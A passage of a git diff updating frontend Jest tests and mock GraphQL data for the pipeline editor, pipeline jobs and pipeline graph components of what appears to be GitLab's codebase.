mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo({ mountFn: mount }); await waitForPromises(); }); @@ -271,10 +237,7 @@ describe('Pipeline editor branch switcher', () => { describe('when searching', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo({ mountFn: mount }); await waitForPromises(); }); @@ -374,10 +337,7 @@ describe('Pipeline editor branch switcher', () => { describe('when scrolling to the bottom of the list', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo(); await waitForPromises(); }); @@ -433,35 +393,4 @@ describe('Pipeline editor branch switcher', () => { }); }); }); - - describe('when committing a new branch', () => { - const createNewBranch = async () => { - setMockResolvedValues({ - currentBranch: mockNewBranch, - lastCommitBranch: mockNewBranch, - }); - await wrapper.vm.$apollo.queries.currentBranch.refetch(); - await wrapper.vm.$apollo.queries.lastCommitBranch.refetch(); - }; - - beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); - createComponentWithApollo({ mountFn: mount }); - await waitForPromises(); - await createNewBranch(); - }); - - it('sets new branch as current branch', () => { - expect(defaultBranchInDropdown().text()).toBe(mockNewBranch); - expect(defaultBranchInDropdown().props('isChecked')).toBe(true); - }); - - it('adds new branch to branch switcher', () => { - expect(defaultBranchInDropdown().text()).toBe(mockNewBranch); - expect(findDropdownItems()).toHaveLength(mockTotalBranchResults + 1); - }); - }); }); diff --git 
a/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js b/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js index 29ab52bde8f..c101b1d21c7 100644 --- a/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js +++ b/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js @@ -4,7 +4,7 @@ import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import PipelineStatus, { i18n } from '~/pipeline_editor/components/header/pipeline_status.vue'; -import getPipelineQuery from '~/pipeline_editor/graphql/queries/client/pipeline.graphql'; +import getPipelineQuery from '~/pipeline_editor/graphql/queries/pipeline.query.graphql'; import PipelineEditorMiniGraph from '~/pipeline_editor/components/header/pipeline_editor_mini_graph.vue'; import { mockCommitSha, mockProjectPipeline, mockProjectFullPath } from '../../mock_data'; @@ -39,8 +39,6 @@ describe('Pipeline Status', () => { const findPipelineId = () => wrapper.find('[data-testid="pipeline-id"]'); const findPipelineCommit = () => wrapper.find('[data-testid="pipeline-commit"]'); const findPipelineErrorMsg = () => wrapper.find('[data-testid="pipeline-error-msg"]'); - const findPipelineNotTriggeredErrorMsg = () => - wrapper.find('[data-testid="pipeline-not-triggered-error-msg"]'); const findPipelineLoadingMsg = () => wrapper.find('[data-testid="pipeline-loading-msg"]'); const findPipelineViewBtn = () => wrapper.find('[data-testid="pipeline-view-btn"]'); const findStatusIcon = () => wrapper.find('[data-testid="pipeline-status-icon"]'); @@ -119,8 +117,7 @@ describe('Pipeline Status', () => { await waitForPromises(); }); - it('renders api error', () => { - expect(findPipelineNotTriggeredErrorMsg().exists()).toBe(false); + it('renders error', () => { expect(findIcon().attributes('name')).toBe('warning-solid'); expect(findPipelineErrorMsg().text()).toBe(i18n.fetchError); }); 
@@ -132,22 +129,5 @@ describe('Pipeline Status', () => { expect(findPipelineViewBtn().exists()).toBe(false); }); }); - - describe('when pipeline is null', () => { - beforeEach(() => { - mockPipelineQuery.mockResolvedValue({ - data: { project: { pipeline: null } }, - }); - - createComponentWithApollo(); - waitForPromises(); - }); - - it('renders pipeline not triggered error', () => { - expect(findPipelineErrorMsg().exists()).toBe(false); - expect(findIcon().attributes('name')).toBe('information-o'); - expect(findPipelineNotTriggeredErrorMsg().text()).toBe(i18n.pipelineNotTriggeredMsg); - }); - }); }); }); diff --git a/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js b/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js index 5fc0880b09e..ae19ed9ab02 100644 --- a/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js +++ b/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js @@ -1,4 +1,4 @@ -import { GlTable, GlLink } from '@gitlab/ui'; +import { GlTableLite, GlLink } from '@gitlab/ui'; import { shallowMount, mount } from '@vue/test-utils'; import { capitalizeFirstCharacter } from '~/lib/utils/text_utility'; import CiLintResults from '~/pipeline_editor/components/lint/ci_lint_results.vue'; @@ -24,7 +24,7 @@ describe('CI Lint Results', () => { }); }; - const findTable = () => wrapper.find(GlTable); + const findTable = () => wrapper.find(GlTableLite); const findByTestId = (selector) => () => wrapper.find(`[data-testid="ci-lint-${selector}"]`); const findAllByTestId = (selector) => () => wrapper.findAll(`[data-testid="ci-lint-${selector}"]`); diff --git a/spec/frontend/pipeline_editor/mock_data.js b/spec/frontend/pipeline_editor/mock_data.js index 1bfc5c3b93d..fc2cbdeda0a 100644 --- a/spec/frontend/pipeline_editor/mock_data.js +++ b/spec/frontend/pipeline_editor/mock_data.js @@ -39,6 +39,7 @@ job_build: export const mockCiTemplateQueryResponse = { data: { project: { + id: 'project-1', ciTemplate: { 
content: mockCiYml, }, @@ -48,19 +49,22 @@ export const mockCiTemplateQueryResponse = { export const mockBlobContentQueryResponse = { data: { - project: { repository: { blobs: { nodes: [{ rawBlob: mockCiYml }] } } }, + project: { + id: 'project-1', + repository: { blobs: { nodes: [{ id: 'blob-1', rawBlob: mockCiYml }] } }, + }, }, }; export const mockBlobContentQueryResponseNoCiFile = { data: { - project: { repository: { blobs: { nodes: [] } } }, + project: { id: 'project-1', repository: { blobs: { nodes: [] } } }, }, }; export const mockBlobContentQueryResponseEmptyCiFile = { data: { - project: { repository: { blobs: { nodes: [{ rawBlob: '' }] } } }, + project: { id: 'project-1', repository: { blobs: { nodes: [{ rawBlob: '' }] } } }, }, }; @@ -93,6 +97,7 @@ export const mockCiConfigQueryResponse = { groups: { nodes: [ { + id: 'group-1', name: 'job_test_1', size: 1, jobs: { @@ -108,6 +113,7 @@ export const mockCiConfigQueryResponse = { __typename: 'CiConfigGroup', }, { + id: 'group-2', name: 'job_test_2', size: 1, jobs: { @@ -170,9 +176,11 @@ export const mergeUnwrappedCiConfig = (mergedConfig) => { export const mockCommitShaResults = { data: { project: { + id: '1', repository: { tree: { lastCommit: { + id: 'commit-1', sha: mockCommitSha, }, }, @@ -184,9 +192,11 @@ export const mockCommitShaResults = { export const mockNewCommitShaResults = { data: { project: { + id: '1', repository: { tree: { lastCommit: { + id: 'commit-1', sha: 'eeff1122', }, }, @@ -198,9 +208,11 @@ export const mockNewCommitShaResults = { export const mockEmptyCommitShaResults = { data: { project: { + id: '1', repository: { tree: { lastCommit: { + id: 'commit-1', sha: '', }, }, @@ -212,6 +224,7 @@ export const mockEmptyCommitShaResults = { export const mockProjectBranches = { data: { project: { + id: '1', repository: { branchNames: [ 'main', @@ -236,6 +249,7 @@ export const mockTotalBranchResults = export const mockSearchBranches = { data: { project: { + id: '1', repository: { branchNames: 
['test', 'better-feature', 'update-ci', 'test-merge-request'], }, @@ -248,6 +262,7 @@ export const mockTotalSearchResults = mockSearchBranches.data.project.repository export const mockEmptySearchBranches = { data: { project: { + id: '1', repository: { branchNames: [], }, @@ -284,16 +299,19 @@ export const mockProjectPipeline = ({ hasStages = true } = {}) => { : null; return { + id: '1', pipeline: { id: 'gid://gitlab/Ci::Pipeline/118', iid: '28', shortSha: mockCommitSha, status: 'SUCCESS', commit: { + id: 'commit-1', title: 'Update .gitlabe-ci.yml', webPath: '/-/commit/aabbccdd', }, detailedStatus: { + id: 'status-1', detailsPath: '/root/sample-ci-project/-/pipelines/118', group: 'success', icon: 'status_success', @@ -453,3 +471,33 @@ export const mockErrors = [ export const mockWarnings = [ '"jobs:multi_project_job may allow multiple pipelines to run for a single action due to `rules:when` clause with no `workflow:rules` - read more: https://docs.gitlab.com/ee/ci/troubleshooting.html#pipeline-warnings"', ]; + +export const mockCommitCreateResponse = { + data: { + commitCreate: { + __typename: 'CommitCreatePayload', + errors: [], + commit: { + __typename: 'Commit', + id: 'commit-1', + sha: mockCommitNextSha, + }, + commitPipelinePath: '', + }, + }, +}; + +export const mockCommitCreateResponseNewEtag = { + data: { + commitCreate: { + __typename: 'CommitCreatePayload', + errors: [], + commit: { + __typename: 'Commit', + id: 'commit-2', + sha: mockCommitNextSha, + }, + commitPipelinePath: '/api/graphql:pipelines/sha/550ceace1acd373c84d02bd539cb9d4614f786db', + }, + }, +}; diff --git a/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js b/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js index f6afef595c6..09d7d4f7ca6 100644 --- a/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js +++ b/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js @@ -8,13 +8,12 @@ import waitForPromises from 'helpers/wait_for_promises'; import PipelineEditorTabs from 
'~/pipeline_editor/components/pipeline_editor_tabs.vue'; import PipelineEditorEmptyState from '~/pipeline_editor/components/ui/pipeline_editor_empty_state.vue'; import PipelineEditorMessages from '~/pipeline_editor/components/ui/pipeline_editor_messages.vue'; -import { COMMIT_SUCCESS, COMMIT_FAILURE } from '~/pipeline_editor/constants'; -import getBlobContent from '~/pipeline_editor/graphql/queries/blob_content.graphql'; -import getCiConfigData from '~/pipeline_editor/graphql/queries/ci_config.graphql'; +import { COMMIT_SUCCESS, COMMIT_FAILURE, LOAD_FAILURE_UNKNOWN } from '~/pipeline_editor/constants'; +import getBlobContent from '~/pipeline_editor/graphql/queries/blob_content.query.graphql'; +import getCiConfigData from '~/pipeline_editor/graphql/queries/ci_config.query.graphql'; import getTemplate from '~/pipeline_editor/graphql/queries/get_starter_template.query.graphql'; import getLatestCommitShaQuery from '~/pipeline_editor/graphql/queries/latest_commit_sha.query.graphql'; - -import getPipelineQuery from '~/pipeline_editor/graphql/queries/client/pipeline.graphql'; +import getPipelineQuery from '~/pipeline_editor/graphql/queries/pipeline.query.graphql'; import PipelineEditorApp from '~/pipeline_editor/pipeline_editor_app.vue'; import PipelineEditorHome from '~/pipeline_editor/pipeline_editor_home.vue'; @@ -412,6 +411,94 @@ describe('Pipeline editor app component', () => { }); }); + describe('when multiple errors occurs in a row', () => { + const updateFailureMessage = 'The GitLab CI configuration could not be updated.'; + const unknownFailureMessage = 'The CI configuration was not loaded, please try again.'; + const unknownReasons = ['Commit failed']; + const alertErrorMessage = `${updateFailureMessage} ${unknownReasons[0]}`; + + const emitError = (type = COMMIT_FAILURE, reasons = unknownReasons) => + findEditorHome().vm.$emit('showError', { + type, + reasons, + }); + + beforeEach(async () => { + 
mockBlobContentData.mockResolvedValue(mockBlobContentQueryResponse); + mockCiConfigData.mockResolvedValue(mockCiConfigQueryResponse); + mockLatestCommitShaQuery.mockResolvedValue(mockCommitShaResults); + + window.scrollTo = jest.fn(); + + await createComponentWithApollo({ stubs: { PipelineEditorMessages } }); + await emitError(); + }); + + it('shows an error message for the first error', () => { + expect(findAlert().text()).toMatchInterpolatedText(alertErrorMessage); + }); + + it('scrolls to the top of the page to bring attention to the error message', () => { + expect(window.scrollTo).toHaveBeenCalledWith({ top: 0, behavior: 'smooth' }); + expect(window.scrollTo).toHaveBeenCalledTimes(1); + }); + + it('does not scroll to the top of the page if the same error occur multiple times in a row', async () => { + await emitError(); + + expect(window.scrollTo).toHaveBeenCalledTimes(1); + expect(findAlert().text()).toMatchInterpolatedText(alertErrorMessage); + }); + + it('scrolls to the top if the error is different', async () => { + await emitError(LOAD_FAILURE_UNKNOWN, []); + + expect(findAlert().text()).toMatchInterpolatedText(unknownFailureMessage); + expect(window.scrollTo).toHaveBeenCalledTimes(2); + }); + + describe('when a user dismiss the alert', () => { + beforeEach(async () => { + await findAlert().vm.$emit('dismiss'); + }); + + it('shows an error if the type is the same, but the reason is different', async () => { + const newReason = 'Something broke'; + + await emitError(COMMIT_FAILURE, [newReason]); + + expect(window.scrollTo).toHaveBeenCalledTimes(2); + expect(findAlert().text()).toMatchInterpolatedText(`${updateFailureMessage} ${newReason}`); + }); + + it('does not show an error or scroll if a new error with the same type occurs', async () => { + await emitError(); + + expect(window.scrollTo).toHaveBeenCalledTimes(1); + expect(findAlert().exists()).toBe(false); + }); + + it('it shows an error and scroll when a new type is emitted', async () => { + await 
emitError(LOAD_FAILURE_UNKNOWN, []); + + expect(window.scrollTo).toHaveBeenCalledTimes(2); + expect(findAlert().text()).toMatchInterpolatedText(unknownFailureMessage); + }); + + it('it shows an error and scroll if a previously shown type happen again', async () => { + await emitError(LOAD_FAILURE_UNKNOWN, []); + + expect(window.scrollTo).toHaveBeenCalledTimes(2); + expect(findAlert().text()).toMatchInterpolatedText(unknownFailureMessage); + + await emitError(); + + expect(window.scrollTo).toHaveBeenCalledTimes(3); + expect(findAlert().text()).toMatchInterpolatedText(alertErrorMessage); + }); + }); + }); + describe('when add_new_config_file query param is present', () => { const originalLocation = window.location.href; diff --git a/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap b/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap index 60625d301c0..99de0d2a3ef 100644 --- a/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap +++ b/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap @@ -6,9 +6,11 @@ Array [ "groups": Array [ Object { "__typename": "CiGroup", + "id": "4", "jobs": Array [ Object { "__typename": "CiJob", + "id": "6", "name": "build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl", "needs": Array [], "scheduledAt": null, @@ -18,6 +20,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "8", "path": "/root/abcd-dag/-/jobs/1482/retry", "title": "Retry", }, @@ -25,6 +28,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "7", "tooltip": "passed", }, }, @@ -36,14 +40,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "5", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "9", "jobs": Array [ Object { "__typename": "CiJob", + "id": "11", "name": "build_b", "needs": Array [], "scheduledAt": null, @@ -53,6 +60,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this 
job", "icon": "retry", + "id": "13", "path": "/root/abcd-dag/-/jobs/1515/retry", "title": "Retry", }, @@ -60,6 +68,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "12", "tooltip": "passed", }, }, @@ -71,14 +80,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "10", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "14", "jobs": Array [ Object { "__typename": "CiJob", + "id": "16", "name": "build_c", "needs": Array [], "scheduledAt": null, @@ -88,6 +100,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "18", "path": "/root/abcd-dag/-/jobs/1484/retry", "title": "Retry", }, @@ -95,6 +108,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "17", "tooltip": "passed", }, }, @@ -106,14 +120,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "15", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "19", "jobs": Array [ Object { "__typename": "CiJob", + "id": "21", "name": "build_d 1/3", "needs": Array [], "scheduledAt": null, @@ -123,6 +140,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "23", "path": "/root/abcd-dag/-/jobs/1485/retry", "title": "Retry", }, @@ -130,11 +148,13 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "22", "tooltip": "passed", }, }, Object { "__typename": "CiJob", + "id": "24", "name": "build_d 2/3", "needs": Array [], "scheduledAt": null, @@ -144,6 +164,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "26", "path": "/root/abcd-dag/-/jobs/1486/retry", "title": "Retry", }, @@ -151,11 +172,13 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "25", "tooltip": "passed", }, }, Object { "__typename": "CiJob", + "id": "27", "name": 
"build_d 3/3", "needs": Array [], "scheduledAt": null, @@ -165,6 +188,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "29", "path": "/root/abcd-dag/-/jobs/1487/retry", "title": "Retry", }, @@ -172,6 +196,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "28", "tooltip": "passed", }, }, @@ -183,14 +208,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "20", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "57", "jobs": Array [ Object { "__typename": "CiJob", + "id": "59", "name": "test_c", "needs": Array [], "scheduledAt": null, @@ -201,6 +229,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "60", "tooltip": null, }, }, @@ -212,6 +241,7 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "58", "label": null, }, }, @@ -226,9 +256,11 @@ Array [ "groups": Array [ Object { "__typename": "CiGroup", + "id": "32", "jobs": Array [ Object { "__typename": "CiJob", + "id": "34", "name": "test_a", "needs": Array [ "build_c", @@ -242,6 +274,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "36", "path": "/root/abcd-dag/-/jobs/1514/retry", "title": "Retry", }, @@ -249,6 +282,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "35", "tooltip": "passed", }, }, @@ -260,14 +294,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "33", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "40", "jobs": Array [ Object { "__typename": "CiJob", + "id": "42", "name": "test_b 1/2", "needs": Array [ "build_d 3/3", @@ -283,6 +320,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "44", "path": "/root/abcd-dag/-/jobs/1489/retry", "title": "Retry", }, @@ -290,11 
+328,13 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "43", "tooltip": "passed", }, }, Object { "__typename": "CiJob", + "id": "67", "name": "test_b 2/2", "needs": Array [ "build_d 3/3", @@ -310,6 +350,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "51", "path": "/root/abcd-dag/-/jobs/1490/retry", "title": "Retry", }, @@ -317,6 +358,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "50", "tooltip": "passed", }, }, @@ -328,14 +370,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "41", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "61", "jobs": Array [ Object { "__typename": "CiJob", + "id": "53", "name": "test_d", "needs": Array [ "build_b", @@ -348,6 +393,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "64", "tooltip": null, }, }, @@ -359,6 +405,7 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "62", "label": null, }, }, diff --git a/spec/frontend/pipelines/components/jobs/jobs_app_spec.js b/spec/frontend/pipelines/components/jobs/jobs_app_spec.js new file mode 100644 index 00000000000..1ea6096c922 --- /dev/null +++ b/spec/frontend/pipelines/components/jobs/jobs_app_spec.js @@ -0,0 +1,106 @@ +import { GlIntersectionObserver, GlSkeletonLoader } from '@gitlab/ui'; +import { createLocalVue, shallowMount } from '@vue/test-utils'; +import VueApollo from 'vue-apollo'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import createFlash from '~/flash'; +import JobsApp from '~/pipelines/components/jobs/jobs_app.vue'; +import JobsTable from '~/jobs/components/table/jobs_table.vue'; +import getPipelineJobsQuery from '~/pipelines/graphql/queries/get_pipeline_jobs.query.graphql'; +import { mockPipelineJobsQueryResponse } 
from '../../mock_data'; + +const localVue = createLocalVue(); +localVue.use(VueApollo); + +jest.mock('~/flash'); + +describe('Jobs app', () => { + let wrapper; + let resolverSpy; + + const findSkeletonLoader = () => wrapper.findComponent(GlSkeletonLoader); + const findJobsTable = () => wrapper.findComponent(JobsTable); + + const triggerInfiniteScroll = () => + wrapper.findComponent(GlIntersectionObserver).vm.$emit('appear'); + + const createMockApolloProvider = (resolver) => { + const requestHandlers = [[getPipelineJobsQuery, resolver]]; + + return createMockApollo(requestHandlers); + }; + + const createComponent = (resolver) => { + wrapper = shallowMount(JobsApp, { + provide: { + fullPath: 'root/ci-project', + pipelineIid: 1, + }, + localVue, + apolloProvider: createMockApolloProvider(resolver), + }); + }; + + beforeEach(() => { + resolverSpy = jest.fn().mockResolvedValue(mockPipelineJobsQueryResponse); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('displays the loading state', () => { + createComponent(resolverSpy); + + expect(findSkeletonLoader().exists()).toBe(true); + expect(findJobsTable().exists()).toBe(false); + }); + + it('displays the jobs table', async () => { + createComponent(resolverSpy); + + await waitForPromises(); + + expect(findJobsTable().exists()).toBe(true); + expect(findSkeletonLoader().exists()).toBe(false); + expect(createFlash).not.toHaveBeenCalled(); + }); + + it('handles job fetch error correctly', async () => { + resolverSpy = jest.fn().mockRejectedValue(new Error('GraphQL error')); + + createComponent(resolverSpy); + + await waitForPromises(); + + expect(createFlash).toHaveBeenCalledWith({ + message: 'An error occured while fetching the pipelines jobs.', + }); + }); + + it('handles infinite scrolling by calling fetchMore', async () => { + createComponent(resolverSpy); + + await waitForPromises(); + + triggerInfiniteScroll(); + + expect(resolverSpy).toHaveBeenCalledWith({ + after: 'eyJpZCI6Ijg0NyJ9', + fullPath: 
'root/ci-project', + iid: 1, + }); + }); + + it('does not display main loading state again after fetchMore', async () => { + createComponent(resolverSpy); + + expect(findSkeletonLoader().exists()).toBe(true); + + await waitForPromises(); + + triggerInfiniteScroll(); + + expect(findSkeletonLoader().exists()).toBe(false); + }); +}); diff --git a/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js b/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js index db4de6deeb7..04e004dc6c1 100644 --- a/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js +++ b/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js @@ -1,7 +1,7 @@ -import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlButton, GlButtonGroup, GlLoadingIcon } from '@gitlab/ui'; import { mount, shallowMount } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; -import Vue from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import { useLocalStorageSpy } from 'helpers/local_storage_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -98,7 +98,6 @@ describe('Pipeline graph wrapper', () => { afterEach(() => { wrapper.destroy(); - wrapper = null; }); beforeAll(() => { @@ -136,7 +135,7 @@ describe('Pipeline graph wrapper', () => { beforeEach(async () => { createComponentWithApollo(); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not display the loading icon', () => { @@ -165,7 +164,7 @@ describe('Pipeline graph wrapper', () => { getPipelineDetailsHandler: jest.fn().mockRejectedValue(new Error('GraphQL error')), }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not display the loading icon', () => { @@ -189,7 +188,7 @@ describe('Pipeline graph wrapper', () => { }, }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not display the loading icon', () => { @@ 
-211,7 +210,7 @@ describe('Pipeline graph wrapper', () => { createComponentWithApollo(); jest.spyOn(wrapper.vm.$apollo.queries.headerPipeline, 'refetch'); jest.spyOn(wrapper.vm.$apollo.queries.pipeline, 'refetch'); - await wrapper.vm.$nextTick(); + await nextTick(); getGraph().vm.$emit('refreshPipelineGraph'); }); @@ -225,8 +224,8 @@ describe('Pipeline graph wrapper', () => { describe('when query times out', () => { const advanceApolloTimers = async () => { jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); - await wrapper.vm.$nextTick(); + await nextTick(); + await nextTick(); }; beforeEach(async () => { @@ -246,7 +245,7 @@ describe('Pipeline graph wrapper', () => { .mockResolvedValueOnce(errorData); createComponentWithApollo({ getPipelineDetailsHandler: failSucceedFail }); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('shows correct errors and does not overwrite populated data when data is empty', async () => { @@ -276,7 +275,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('appears when pipeline uses needs', () => { @@ -319,7 +318,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('sets showLinks to true', async () => { @@ -329,7 +328,7 @@ describe('Pipeline graph wrapper', () => { expect(getViewSelector().props('type')).toBe(LAYER_VIEW); await getDependenciesToggle().vm.$emit('change', true); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); expect(wrapper.findComponent(LinksLayer).props('showLinks')).toBe(true); }); }); @@ -345,7 +344,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('shows the hover tip in the view selector', async () => { @@ -366,7 +365,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await 
wrapper.vm.$nextTick(); + await nextTick(); }); it('does not show the hover tip', async () => { @@ -384,7 +383,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); afterEach(() => { @@ -393,9 +392,10 @@ describe('Pipeline graph wrapper', () => { it('reads the view type from localStorage when available', () => { const viewSelectorNeedsSegment = wrapper - .findAll('[data-testid="pipeline-view-selector"] > label') + .find(GlButtonGroup) + .findAllComponents(GlButton) .at(1); - expect(viewSelectorNeedsSegment.classes()).toContain('active'); + expect(viewSelectorNeedsSegment.classes()).toContain('selected'); }); }); @@ -412,7 +412,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); afterEach(() => { @@ -435,7 +435,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not appear when pipeline does not use needs', () => { @@ -462,7 +462,7 @@ describe('Pipeline graph wrapper', () => { beforeEach(async () => { createComponentWithApollo(); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('is not called', () => { @@ -506,7 +506,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('attempts to collect metrics', () => { diff --git a/spec/frontend/pipelines/graph/graph_view_selector_spec.js b/spec/frontend/pipelines/graph/graph_view_selector_spec.js index f4faa25545b..f574f4dccc5 100644 --- a/spec/frontend/pipelines/graph/graph_view_selector_spec.js +++ b/spec/frontend/pipelines/graph/graph_view_selector_spec.js @@ -1,4 +1,4 @@ -import { GlAlert, GlLoadingIcon, GlSegmentedControl } from '@gitlab/ui'; +import { GlAlert, GlButton, GlButtonGroup, GlLoadingIcon } from '@gitlab/ui'; import { mount, 
shallowMount } from '@vue/test-utils'; import { LAYER_VIEW, STAGE_VIEW } from '~/pipelines/components/graph/constants'; import GraphViewSelector from '~/pipelines/components/graph/graph_view_selector.vue'; @@ -7,9 +7,9 @@ describe('the graph view selector component', () => { let wrapper; const findDependenciesToggle = () => wrapper.find('[data-testid="show-links-toggle"]'); - const findViewTypeSelector = () => wrapper.findComponent(GlSegmentedControl); - const findStageViewLabel = () => findViewTypeSelector().findAll('label').at(0); - const findLayersViewLabel = () => findViewTypeSelector().findAll('label').at(1); + const findViewTypeSelector = () => wrapper.findComponent(GlButtonGroup); + const findStageViewButton = () => findViewTypeSelector().findAllComponents(GlButton).at(0); + const findLayerViewButton = () => findViewTypeSelector().findAllComponents(GlButton).at(1); const findSwitcherLoader = () => wrapper.find('[data-testid="switcher-loading-state"]'); const findToggleLoader = () => findDependenciesToggle().find(GlLoadingIcon); const findHoverTip = () => wrapper.findComponent(GlAlert); @@ -51,8 +51,13 @@ describe('the graph view selector component', () => { createComponent({ mountFn: mount }); }); - it('shows the Stage view label as active in the selector', () => { - expect(findStageViewLabel().classes()).toContain('active'); + it('shows the Stage view button as selected', () => { + expect(findStageViewButton().classes('selected')).toBe(true); + }); + + it('shows the Job dependencies view button not selected', () => { + expect(findLayerViewButton().exists()).toBe(true); + expect(findLayerViewButton().classes('selected')).toBe(false); }); it('does not show the Job dependencies (links) toggle', () => { @@ -70,8 +75,13 @@ describe('the graph view selector component', () => { }); }); - it('shows the Job dependencies view label as active in the selector', () => { - expect(findLayersViewLabel().classes()).toContain('active'); + it('shows the Job dependencies view 
